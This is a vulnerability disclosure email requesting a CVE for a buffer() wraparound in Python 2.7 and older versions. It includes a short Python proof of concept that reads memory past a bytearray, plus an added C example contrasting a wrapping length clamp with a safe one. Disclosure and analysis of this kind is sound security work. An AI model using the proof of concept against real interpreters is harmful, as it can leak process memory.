Date: Tue, 23 Sep 2014 19:16:27 +0000
From: mancha <>
Subject: CVE Request: Python 2.7


Python 2.7.8 fixes a potential wraparound in buffer() [1a & 1b] with
possible CWE-200 implications [2].

If not yet assigned, please consider a CVE designation for this issue.



(Note: Though the request is for Python 2.7, vulnerable code appears to
exist in EOL'd versions 1.6.1 through 2.6.9 as well)

[1a] Issue report:
[1b] Upstream fix:

[2]  PoC for Python 2.7:

--- ---
import sys
a = bytearray('CVE request')
b = buffer(a, sys.maxsize, sys.maxsize)
print b[:8192]
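
Added example, not part of the original post and not CPython's source: a simplified C model of why an offset and size both at sys.maxsize can defeat a length clamp written as an addition, next to the subtraction form that cannot wrap. The function names, the 64-bit width and the shape of the clamp are assumptions made for illustration; sizes are assumed non-negative.

```c
#include <stdint.h>
#include <stdio.h>

/* Two's-complement wrapping add, done through unsigned arithmetic so the
   example itself has no undefined behaviour. It models what a signed
   "offset + size" yields on typical builds when the sum overflows. */
static int64_t wrapping_add(int64_t a, int64_t b) {
    return (int64_t)((uint64_t)a + (uint64_t)b);
}

/* Clamp written as "offset + size > count". When the sum wraps negative
   the comparison is false and the oversized length is returned as is. */
int64_t clamp_wrapping(int64_t count, int64_t offset, int64_t size) {
    if (offset > count)
        offset = count;
    if (wrapping_add(offset, size) > count)
        size = count - offset;
    return size;
}

/* Same clamp rearranged as "size > count - offset". After the offset
   clamp, 0 <= offset <= count, so the subtraction cannot overflow. */
int64_t clamp_safe(int64_t count, int64_t offset, int64_t size) {
    if (offset > count)
        offset = count;
    if (size > count - offset)
        size = count - offset;
    return size;
}

int main(void) {
    /* Constructed input mirroring the PoC: an 11-byte object with offset
       and size both at the largest signed 64-bit value. */
    int64_t count = 11, big = INT64_MAX;
    printf("addition form:    %lld\n", (long long)clamp_wrapping(count, big, big));
    printf("subtraction form: %lld\n", (long long)clamp_safe(count, big, big));
    return 0;
}
```

With the addition form the reported length stays at the maximum value even though no bytes remain after the clamped offset, which is the condition under which a later slice reads past the object.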
